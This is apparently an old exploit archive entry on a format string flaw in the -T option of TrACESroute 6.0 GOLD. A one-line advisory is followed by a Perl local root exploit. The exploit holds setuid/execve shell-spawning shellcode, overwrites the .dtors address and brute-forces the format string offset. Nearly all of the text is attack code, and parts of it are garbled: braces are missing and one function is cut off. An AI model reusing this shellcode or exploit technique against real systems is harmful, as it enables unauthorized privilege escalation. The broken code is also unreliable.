A format string vulnerability exists in TrACESroute. The problem exists in the terminator (-T) function of the program. Due to improper use of the fprintf function, an attacker may be able to supply a malicious format string to the program that reults in writing of attacker-supplied values to arbitrary locations in memory.
## ---/ /---------------------------------------------------
## TrACESroute 6.0 GOLD local format string exploit
## * tested on Red Hat Linux release 7.2 (Enigma)
## * Jun 12 2002
## Author: stringz //
## Vulnerability discovered by: downbload //
## Developed on the Snosoft Cerebrum test bed. -
## Greets: g463, syphix, S (super), KF, vacuum, dageshi, sozni,
## obscure, jove, rachel, kevin, and all of my 2e2h friends.
## ---/ powered by pot /-----------------------------------------------
# setuid + execve shellcode
$kode =
"\x31\xdb". # xor ebx, ebx
"\xf7\xe3". # mul ebx
"\xb0\x17". # mov al, 0x17
"\xcd\x80". # int 0x80
"\x31\xc0". # xor eax, eax
"\x99". # cdq
"\x52". # push edx
"\x68\x2f\x2f\x73\x68". # push dword 0x68732f2f
"\x68\x2f\x62\x69\x6e". # push dword 0x6e69622f
"\x89\xe3". # mov ebx, esp
"\x52". # push edx
"\x53". # push ebx
"\x89\xe1". # mov ecx, esp
"\xb0\x0b". # mov al, 0x0b
"\xcd\x80"; # int 0x80
$vuln = "./tr"; # CHANGE THIS!@#$%!
$dtors = 0x804e48c + 4;;
printf("\n-- TrACESroute 6.0 GOLD local format string exploit\n");
printf("-- Author: stringz // thc\\n\n");
printf("-- Vulnerability discovered by: downbload // downbload\\n");
$ret_addr = 0xc0000000 - 4
- (length($vuln) + 1)
- (length($kode) + 1)
undef(%ENV); $ENV{'1337'} = $kode;
printf("overwriting %#.08x with %#.08x\n", $dtors, $ret_addr);
printf("bruteforcing distance (1 .. 300)\n");
for (1 .. 300) {
$fmt_str = sw_fmtstr_create($dtors, $ret_addr, $_);
die("\x0a") if (system("$vuln -T $fmt_str localhost"))
=~ m/^(0|256|512|32512)$/; # may need a tweak ;)
sw_fmtstr_create ($$$)
die("Incorrect number of arguments for sw_fmtstr_create")
unless @_ == 3;
my ($dest_addr, $ret_addr, $dist) = @_;
my ($word, $qword) = (2, 8);
# $dest_addr = where to write $ret_addr
# $ret_addr = where to return execution
# $dist = the calculated distance
$tmp1 = (($ret_addr >> 16) & 0xffff);
$tmp2 = $ret_addr & 0xffff;
if ($tmp1 < $tmp2) {
$high = $tmp1 - $qword;
$low = $tmp2 - $high - $qword;
$dest_addr1 = pack('L', $dest_addr + $word);
$dest_addr2 = pack('L', $dest_addr);
else {
$high = $tmp2 - $qword;
$low = $tmp1 - $high - $qword;
$dest_addr1 = pack('L', $dest_addr);
$dest_addr2 = pack('L', $dest_addr + $word);
$dest_addr1, $dest_addr2, $high, $dist,
$low, $dist + 1);